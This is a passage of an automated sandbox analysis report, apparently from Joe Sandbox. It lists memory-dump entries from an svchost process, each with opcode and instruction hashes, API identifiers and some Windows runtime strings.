                                                • Instruction Fuzzy Hash: E8F0283A640308BFEB24E60CDC02FD97768EB41B04F050464FA00EF281D2F0AA10EA90
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: #%u
                                                • API String ID: 48624451-232158463
                                                • Opcode ID: 95eecad1a41a9a1ebbb41433d499da2e898ac58b150ce1197c8b56c08c1a7ec1
                                                • Instruction ID: 1456d5bfc5b60d24ea47eff171b325440adcc5cda252498e2d8795ea1696fea7
                                                • Opcode Fuzzy Hash: 95eecad1a41a9a1ebbb41433d499da2e898ac58b150ce1197c8b56c08c1a7ec1
                                                • Instruction Fuzzy Hash: 06715B76A002499FDB05DFA9D994BAEB7B8FF48304F164065E901EB251EB34EE01DB60
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: kLsE
                                                • API String ID: 3446177414-3058123920
                                                • Opcode ID: e885cc6177feb6670a86f22e2459c7cb879a7008162c6773e95421973d44ab0e
                                                • Instruction ID: c6828853ad4a863a26bf1e63059b071ed2fecf56155baf851f426090f482c5f6
                                                • Opcode Fuzzy Hash: e885cc6177feb6670a86f22e2459c7cb879a7008162c6773e95421973d44ab0e
                                                • Instruction Fuzzy Hash: 8A4187735013504AE731FF65E884B69BBA4AB30B24F190258FEA0CF2C9CBB09585D7A0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@
                                                • API String ID: 0-149943524
                                                • Opcode ID: 2d6d0801389f9bf6ba9d1fd230e915b8deede90f359de03dbd4ffc867d1c4450
                                                • Instruction ID: f0d83d79cfc8e0eb2c83ab1de05bf49b89b4d2a5a44e631d345cf3cb4450851f
                                                • Opcode Fuzzy Hash: 2d6d0801389f9bf6ba9d1fd230e915b8deede90f359de03dbd4ffc867d1c4450
                                                • Instruction Fuzzy Hash: A932A8755083118BDB24CF19C484B7EF7E1AF8A750F19492EF986DB290E734CA94CB92
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: `$`
                                                • API String ID: 0-197956300
                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction ID: f859c663c0bb734eb4a3c39f6d9b6671c0174392a7544de40434cd290343a0fd
                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction Fuzzy Hash: D9C1DE352047429FDB64CF29C845B6BFBE5AF84318F084A2DFA99CA290D774D645CF81
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: 3eef02902b89abdd4aa05481f1817978472cc411fb3d355d4c4e419edb8f570e
                                                • Instruction ID: 2fb2911126f5376dd9212d302047102411fd69b9a09ad4bae3dc3301d33cd93d
                                                • Opcode Fuzzy Hash: 3eef02902b89abdd4aa05481f1817978472cc411fb3d355d4c4e419edb8f570e
                                                • Instruction Fuzzy Hash: BC614C72E00B199FDB24DFBDC880BADBBB9FB44704F144069E559EB291D731A940DB90
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$$
                                                • API String ID: 0-233714265
                                                • Opcode ID: 57f136ceaa6c47729ecb5341f8fd0cc98e8b59133d966ad06c975cb988da8c20
                                                • Instruction ID: 6dc7c6dff11edded79869eb8bde08c034dfebceef0fe6be928d2d5b73bab5425
                                                • Opcode Fuzzy Hash: 57f136ceaa6c47729ecb5341f8fd0cc98e8b59133d966ad06c975cb988da8c20
                                                • Instruction Fuzzy Hash: ED61B736A0074ADFDB20EFA4C584BADB7B2BF48308F09406DD515EF680CB74AA41DB90
                                                Strings
                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 03C3A309
                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 03C3A2FB
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                • API String ID: 0-2876891731
                                                • Opcode ID: 88ba39bd85ad4c893c8c90f18b7e4ab0a4a50ca6274d3c5e148ef4ed7bbb3257
                                                • Instruction ID: f6a0a4da448a6ff37b606432ae1ba803537d6f0524f44b2d67a2bb1cf0a2d55f
                                                • Opcode Fuzzy Hash: 88ba39bd85ad4c893c8c90f18b7e4ab0a4a50ca6274d3c5e148ef4ed7bbb3257
                                                • Instruction Fuzzy Hash: 4341CF78A04649DBDB11CF69C844B69B7F4FF86700F1944AAEC81DF2A1E735DA10CB41
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local\$@
                                                • API String ID: 0-380025441
                                                • Opcode ID: ba27445a242533f57c143f14d9b0947ba92cae202c1045376780b528b7cc99f8
                                                • Instruction ID: d19451b5720a3534b69165f500853dc81849b9f0a5ebd4d7acffef7f66427152
                                                • Opcode Fuzzy Hash: ba27445a242533f57c143f14d9b0947ba92cae202c1045376780b528b7cc99f8
                                                • Instruction Fuzzy Hash: AD31B37A5083449FC310DF29C8C0A6BBBE8FBC5654F49092EF995C7260DA30DE05DB92
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: MUI
                                                • API String ID: 0-1339004836
                                                • Opcode ID: f1c59133b1817cf9a0ab131decfb0dfea3b2faaa57a378348a6a973c3ed676e5
                                                • Instruction ID: be00aaf97956b56916b1b5b7d97fe4a1571b43b83d24ab134b2731902e9abb81
                                                • Opcode Fuzzy Hash: f1c59133b1817cf9a0ab131decfb0dfea3b2faaa57a378348a6a973c3ed676e5
                                                • Instruction Fuzzy Hash: EF824C75E002189BDB24CFA9C984BEDF7B5BF4A710F188169D85AEB250DB319E41CF50
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c8bca6361eead5c074511716da2787b4ceb36671cc67e447616df1921eac991a
                                                • Instruction ID: 2d51b14a2c476683a68a3beda7dba8961bd2f3038d6c2c80109ac449adceef35
                                                • Opcode Fuzzy Hash: c8bca6361eead5c074511716da2787b4ceb36671cc67e447616df1921eac991a
                                                • Instruction Fuzzy Hash: D9A16BB5608342CFD724DF29C480A2ABBE5BF89704F19496EE585DB350E730E945CF92
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0db82049e943eed8f3afb27185a05683fe4bad9db05d5e5358d63aed22a0c05e
                                                • Instruction ID: 9e5445505445a6e9497ff835554e335669c171fff8a67fe58c9d5e37b1dc8e54
                                                • Opcode Fuzzy Hash: 0db82049e943eed8f3afb27185a05683fe4bad9db05d5e5358d63aed22a0c05e
                                                • Instruction Fuzzy Hash: 6D4149B5D00288AFDB20DFA9D880AADFBF4FB58300F14416EE859EB211D7319A01DF60
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalTags
                                                • API String ID: 0-1106856819
                                                • Opcode ID: 4f3e426a6e092e9f6209aa5eb0ce3fc0d2c0af962f2ec626ba6c3c08e6782a70
                                                • Instruction ID: 89f174274dab451a1fc6c813c47b92bd799d84f0eb91e9922cf15142aeef4ff4
                                                • Opcode Fuzzy Hash: 4f3e426a6e092e9f6209aa5eb0ce3fc0d2c0af962f2ec626ba6c3c08e6782a70
                                                • Instruction Fuzzy Hash: 0C716D76E0071ADFDF28CF9DD5906ADBBB5BF48708F18816AE806EB240E7309951CB54
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                • Instruction ID: f49e858e14be0f8fd7364af565b33b151c54cc059969ad305024a28233406e22
                                                • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                • Instruction Fuzzy Hash: 90618D76D00219ABDF21DF99C844BEEFBB8FF81710F16456AE810EB290D7709A01DB91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                • Instruction ID: a799be4487b597a356811bf0ba8f747b44f04ad4c5533c96b073fa64e1a2fe85
                                                • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                • Instruction Fuzzy Hash: 24516672A04345AFD721DE54CC44FAAB7B8FB84750F05092DFA80DB290DBB5EA14CB92
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PreferredUILanguages
                                                • API String ID: 0-1884656846
                                                • Opcode ID: 810c034543dd00fee494f1a6761da91e0b247cb54dec8a6bd59465c84adc0f75
                                                • Instruction ID: 4b28760c5f2d574f4213d36b3fc4bf5ebb85770cd9caf03d0f8c2a51e9bf6f07
                                                • Opcode Fuzzy Hash: 810c034543dd00fee494f1a6761da91e0b247cb54dec8a6bd59465c84adc0f75
                                                • Instruction Fuzzy Hash: 6A41C476D04219ABCF11DA95C841BFEF7B9EF44750F050166E911EF254DAB4DE40C7A0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                • Opcode ID: 430cc3a3e55188feac1b2f015b2d9fe2b94c824a6a38076275052869432745e2
                                                • Instruction ID: 78e54c4b5aba878866798ae7a5e83c245f2b725816f6fa7ea74367d5daf8b567
                                                • Opcode Fuzzy Hash: 430cc3a3e55188feac1b2f015b2d9fe2b94c824a6a38076275052869432745e2
                                                • Instruction Fuzzy Hash: 9B4165B6D0062DAADB21DB54CC84FDEB77CAB44718F0185E5EA08EB140DB709E889F94
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: verifier.dll
                                                • API String ID: 0-3265496382
                                                • Opcode ID: a9894b34153a67b0722c8a6172caefa9a7a06d24d795b1cb1d453bea08886d9f
                                                • Instruction ID: 1691e3386777735eecd9dd06246a70f5f48663393301029ff1bc56ce94eb5263
                                                • Opcode Fuzzy Hash: a9894b34153a67b0722c8a6172caefa9a7a06d24d795b1cb1d453bea08886d9f
                                                • Instruction Fuzzy Hash: 11319376A003119FDB24DF69A850B76B7F6EF5A314F598079E608DF391E7328E808790
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Flst
                                                • API String ID: 0-2374792617
                                                • Opcode ID: 2d1d877e8147a58199ad53010722fab38f55da189a6406a133c71cfc460cab22
                                                • Instruction ID: befa988da6598c5e9ce8788fe5bc9880c0530d25e80c7e810e4ab6897dead9ef
                                                • Opcode Fuzzy Hash: 2d1d877e8147a58199ad53010722fab38f55da189a6406a133c71cfc460cab22
                                                • Instruction Fuzzy Hash: B34198B56053019FC314CF19D2C0A16FBE4EF89714F18856EE44ACF291DB71DA42CB91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Actx
                                                • API String ID: 0-89312691
                                                • Opcode ID: 8e461a6b7e4b441228d2f6761f3533095b7632f66fe3d05b79a50c21420d3f45
                                                • Instruction ID: 51aa2605a9077e87c9f14c27988b2a49acaa07c69dc42279b2c9ebeb88ca2e48
                                                • Opcode Fuzzy Hash: 8e461a6b7e4b441228d2f6761f3533095b7632f66fe3d05b79a50c21420d3f45
                                                • Instruction Fuzzy Hash: 4C1182307096528BEB24C91E88546B6F2D9EB97264F3C852AE462CF391D673DD418780
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrCreateEnclave
                                                • API String ID: 0-3262589265
                                                • Opcode ID: 5398c06d019a3f2df23f5f50ed1d8ea40cbff99cf8c36a5a127e35345d3f1474
                                                • Instruction ID: cde1fbade332cebcdc891ea9eefd23b4d3d46529e9c3ff0df21ebe9a14a10d1f
                                                • Opcode Fuzzy Hash: 5398c06d019a3f2df23f5f50ed1d8ea40cbff99cf8c36a5a127e35345d3f1474
                                                • Instruction Fuzzy Hash: D82107B59183449FC320DF1AD844A9BFBE8FBE5B00F144A1EB5A0DB250D7B1D504DB92
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b840e4733519fadc3d9307634be246aea2f36b6c202992ccd72977f2bb4e50fe
                                                • Instruction ID: beb68af9dd1063871adc36d8ded1ce583a87e2c686d53affaa9ebc4275dd1edf
                                                • Opcode Fuzzy Hash: b840e4733519fadc3d9307634be246aea2f36b6c202992ccd72977f2bb4e50fe
                                                • Instruction Fuzzy Hash: 4A429175A006168FDB15EF59C4806BEF7B6FF88318B28856DD552EB340E734EA42CB90
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 373c7826561699dc3d5aca93c4d672f5c0483be2f5678bb18a9fe4d06248e608
                                                • Instruction ID: 77b09d09677fc85c6ab31df57f2df1c4936ad803d6b7002ea21d41b0b8aa1c2f
                                                • Opcode Fuzzy Hash: 373c7826561699dc3d5aca93c4d672f5c0483be2f5678bb18a9fe4d06248e608
                                                • Instruction Fuzzy Hash: D7329976E002199BCF24DFA8C884AAEBBB1FF54714F190029EC05EB381EB359D41CB94
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e517f0956ffd44887f40ed7793f9bd5fd07f9ad37621ad8fa5c3a882db9d706a
                                                • Instruction ID: 714e461ee81374bc0acaa7fb164c481b9a56445cad93ac4ac82ec070d8ef19c7
                                                • Opcode Fuzzy Hash: e517f0956ffd44887f40ed7793f9bd5fd07f9ad37621ad8fa5c3a882db9d706a
                                                • Instruction Fuzzy Hash: E7423975A103599FDB24CF69C881BAEF7B5BF88300F19819DE949EB241D734A981CF60
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 480222e85fa6bbf1c0fd7fba6e02e9a616ebf13f43d33f306fbd067993b0fb5c
                                                • Instruction ID: 64f2683dfbd8f484c7e36b3ae689a9b624088853f97251c668ef6c63b7a3c77c
                                                • Opcode Fuzzy Hash: 480222e85fa6bbf1c0fd7fba6e02e9a616ebf13f43d33f306fbd067993b0fb5c
                                                • Instruction Fuzzy Hash: E422AD78204651CFDB24CF2AC094772B7F1AF45300F18889AFA96CF685E735E692DB61
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: afcba136958c0d2f52006177652e323338911490b871630f98f5a3ccebbb11ae
                                                • Instruction ID: 0efa3fa15b15182e0a8be9f85d01267a049cd5cfb1fa2c26033f31bb78de6074
                                                • Opcode Fuzzy Hash: afcba136958c0d2f52006177652e323338911490b871630f98f5a3ccebbb11ae
                                                • Instruction Fuzzy Hash: A5228035A00216CFCB59CF59C490AAAF7B6FF88314B2D456DDA56DF344DB30AA41CB90
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68632295a5e6b08fc4f35686167cbf91b5494f782c55964ed413408bc94fea54
                                                • Instruction ID: a9ceee2fd36f8d5c220c0074a4cc8a1b4b06f0ee7f88a381e489b7d4631cc9e9
                                                • Opcode Fuzzy Hash: 68632295a5e6b08fc4f35686167cbf91b5494f782c55964ed413408bc94fea54
                                                • Instruction Fuzzy Hash: 4CD1C475A007269BCF14EF65C890ABABBB5BF44708F094629F915DF280EB34EA45CB50
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3124092b18c1185750ccf5bbf40d3549ab01253326b6e7db0c49f220eadbd46
                                                • Instruction ID: 36cf4d49f2b9f0404de4cfe390480388e7d6d5a2803ddabd13e8a08a00aa0104
                                                • Opcode Fuzzy Hash: a3124092b18c1185750ccf5bbf40d3549ab01253326b6e7db0c49f220eadbd46
                                                • Instruction Fuzzy Hash: BBC1A571E002169BEF18CF5AC848BAEF7B5EF55314F198269D815EB280D771EA42CB81
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                • Instruction ID: d334c1a31b82a34959d35abcfe95cdf579f016b65461ef4716b7bcd4152f0a78
                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                • Instruction Fuzzy Hash: CFB13E78A00748AFDF24DF95C980AEBB7BDFF84304F144469A942EB790DA35EA45DB10
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f92fbd45898c2da03748067d30bf3191a3e44c87833c750e9acb7d61e9cbd0a4
                                                • Instruction ID: 23f397a18733344356864ad61c056dc7f10c4437d0abb20fb2d6b52ec3e86710
                                                • Opcode Fuzzy Hash: f92fbd45898c2da03748067d30bf3191a3e44c87833c750e9acb7d61e9cbd0a4
                                                • Instruction Fuzzy Hash: 32A16A75900205AFEB12EFA4CC49FAE77B9AF45750F060094F901EF2A0D775AD50DBA4
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4aba702a05b78d9ca217e2124169597e92c1977c8e2086359d66209299cb692
                                                • Instruction ID: 62cb4eb96a79b102cad59048c22df6155458c89986f8e7f3f7ade8214e11a4d3
                                                • Opcode Fuzzy Hash: d4aba702a05b78d9ca217e2124169597e92c1977c8e2086359d66209299cb692
                                                • Instruction Fuzzy Hash: 68C169741083418FEB64CF15C495BAAB7E4FF88704F49496EE989CB290D774EA08CF92
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c968b0e4dd8eab9e6e16fce3eb331ef7f573e6de141b791e9f311a0e7e6852fd
                                                • Instruction ID: 3bf16fdc07a13450a0073aa4b36b2845eb358b136bba97ba829e7be4bddeb119
                                                • Opcode Fuzzy Hash: c968b0e4dd8eab9e6e16fce3eb331ef7f573e6de141b791e9f311a0e7e6852fd
                                                • Instruction Fuzzy Hash: A8A1C175A0072ADBDB24DF6AC991BAAB7F5FF44318F044129EE05DB281DB34E901DB50
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 43daf1486e112ea1653f4aa484bcc75e2c4297b6cb4f4da2e294b0fd9e39aaf8
                                                • Instruction ID: 24d1ab849e22ac93968fd24f81458c50e30096d4dfd797de98819199cfa9600c
                                                • Opcode Fuzzy Hash: 43daf1486e112ea1653f4aa484bcc75e2c4297b6cb4f4da2e294b0fd9e39aaf8
                                                • Instruction Fuzzy Hash: 0D91B071E00215AFDB15CFA8D884BEEFBB9AF48700F154169E951EB340D738EA509BA0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 40faecd83f0643dfe04d81da684b845ea0da2725f9d89854bf38603903f914d7
                                                • Instruction ID: ffce50bc57664964dd1f114cd67254298e06f74f0dee9c3d5f080b6400e3ded6
                                                • Opcode Fuzzy Hash: 40faecd83f0643dfe04d81da684b845ea0da2725f9d89854bf38603903f914d7
                                                • Instruction Fuzzy Hash: 1A910436A007258BEB24EB79D448B7EB7A5FF84714F0B40AAE805DF240EB34DA41C791
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5ccda8bb4b9bdc01734c0f3ac518810ecf0a3f6867367ee81e77842bac9d5b9
                                                • Instruction ID: 3ca5ff5da37b684c5d074b7dfdd7ecc99c164f23ba3613204f6b28b82d1f8048
                                                • Opcode Fuzzy Hash: e5ccda8bb4b9bdc01734c0f3ac518810ecf0a3f6867367ee81e77842bac9d5b9
                                                • Instruction Fuzzy Hash: FEB10275A093408FD354DF28C580A5AFBF1BB89304F184A6EF899DB351D371EA45CB52
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                • Instruction ID: d54554adef98e06fa37319db79cb24be5979c5b12705ac50a177552ecd9bfd8b
                                                • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                • Instruction Fuzzy Hash: DF818176E002158BEF14CF68C8887AEF7B2FB94354F1A416BD816FB344D6329A40CB95
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0bc85a5d6b5c71eb57af0a1e3d5930a17f5fc452298a005f0e80274d198f4f74
                                                • Instruction ID: acdb49ab7eff64c3e105249ac2daf81580f3f6fd02ddeee266a5844d6a300250
